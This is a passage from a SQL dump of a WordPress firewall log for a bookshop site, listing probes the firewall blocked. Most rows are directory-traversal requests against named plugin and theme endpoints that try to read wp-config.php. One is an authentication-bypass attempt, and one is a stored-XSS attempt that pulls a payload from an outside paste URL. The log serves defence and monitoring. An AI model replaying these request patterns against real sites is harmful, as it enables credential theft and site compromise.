wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t0aHVtYl0=\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(882,1627803934.774223,1627803934.355500,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(883,1627803933.824798,1627803933.359400,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(884,1627803961.909771,1627803961.489800,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thbGJpZF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWMtZG9jay1nYWxsZXJ5L21hY2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(885,1627803960.038043,1627803959.623900,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kYi1iYWNrdXAvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(886,1627803958.711264,1627803958.590000,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3Bvc2UtZG9jLWV4cG9ydGVyL2FzcG9zZV9kb2NfZXhwb3J0ZXJfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(887,1627803958.514966,1627803958.061900,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(888,1627803956.987180,1627803956.571400,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(889,1627803955.847682,1627803955.426700,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(890,1627803954.855277,1627803954.393000,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL05hdGl2ZUNodXJjaC9kb3dubG9hZC9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(891,1627803953.510058,1627803953.101100,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/themes/churchope/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NodXJjaG9wZS9saWIvZG93bmxvYWRsaW5rLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(892,1627803952.178869,1627803951.764600,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/tera-charts/charts/treemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmbl0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy90ZXJhLWNoYXJ0cy9jaGFydHMvdHJlZW1hcC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(893,1627803950.720341,1627803950.603500,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tsaWJwYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zbmlwbGV0cy9tb2R1bGVzL3N5bnRheF9oaWdobGlnaHQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(894,1627803949.952451,1627803949.485000,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtaW1hZ2UtbWFuaXB1bGF0b3IvY29udHJvbGxlci9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(895,1627803949.074066,1627803948.653700,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlX2xpbmtd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWNlbnQtYmFja3Vwcy9kb3dubG9hZC1maWxlLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(896,1627803947.834510,1627803947.720000,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tteVBhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9teWdhbGxlcnkvbXlmdW5jdGlvbnMvbXlnYWxsZXJ5YnJvd3Nlci5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(897,1627803947.163592,1627803946.741400,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thYnNwYXRoXQ==\",\"paramValue\":\"Li4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9taW5pLW1haWwtZGFzaGJvYXJkLXdpZGdldHdwLW1pbmktbWFpbC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(898,1627803946.122400,1627803945.994700,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtbXAzLWF1ZGlvLXBsYXllci9kaXJlY3RfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(899,1627803945.486329,1627803945.070400,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtZG9jdW1lbnQtZW1iZWRkZXIvbGlicy9wZGYucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(900,1627803943.782116,1627803943.666700,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvZG93bmxvYWQtY29udGVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(901,1627803941.418257,1627803940.987200,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/force-download.php?file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvZm9yY2UtZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(902,1627803939.912692,1627803939.794500,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(903,1627804005.885514,1627804005.439200,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(904,1627816802.084315,1627816801.637600,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(905,1627816815.427259,1627816815.000800,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(906,1627816814.614771,1627816814.150800,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(907,1627816813.982709,1627816813.194000,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t0aHVtYl0=\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(908,1627816812.601245,1627816812.178100,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(909,1627816811.377760,1627816811.236000,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(910,1627816828.709035,1627816828.291600,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/themes/churchope/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NodXJjaG9wZS9saWIvZG93bmxvYWRsaW5rLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(911,1627816827.944107,1627816827.525500,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/tera-charts/charts/treemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmbl0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy90ZXJhLWNoYXJ0cy9jaGFydHMvdHJlZW1hcC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(912,1627816826.874449,1627816825.557200,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtaW1hZ2UtbWFuaXB1bGF0b3IvY29udHJvbGxlci9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(913,1627816826.769076,1627816826.582800,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tsaWJwYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zbmlwbGV0cy9tb2R1bGVzL3N5bnRheF9oaWdobGlnaHQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(914,1627816825.011231,1627816824.596900,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlX2xpbmtd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWNlbnQtYmFja3Vwcy9kb3dubG9hZC1maWxlLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(915,1627816823.654304,1627816823.536000,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tteVBhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9teWdhbGxlcnkvbXlmdW5jdGlvbnMvbXlnYWxsZXJ5YnJvd3Nlci5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(916,1627816822.917495,1627816822.508900,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thYnNwYXRoXQ==\",\"paramValue\":\"Li4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9taW5pLW1haWwtZGFzaGJvYXJkLXdpZGdldHdwLW1pbmktbWFpbC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(917,1627816822.066419,1627816821.652200,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtbXAzLWF1ZGlvLXBsYXllci9kaXJlY3RfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(918,1627816821.126403,1627816820.688200,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) 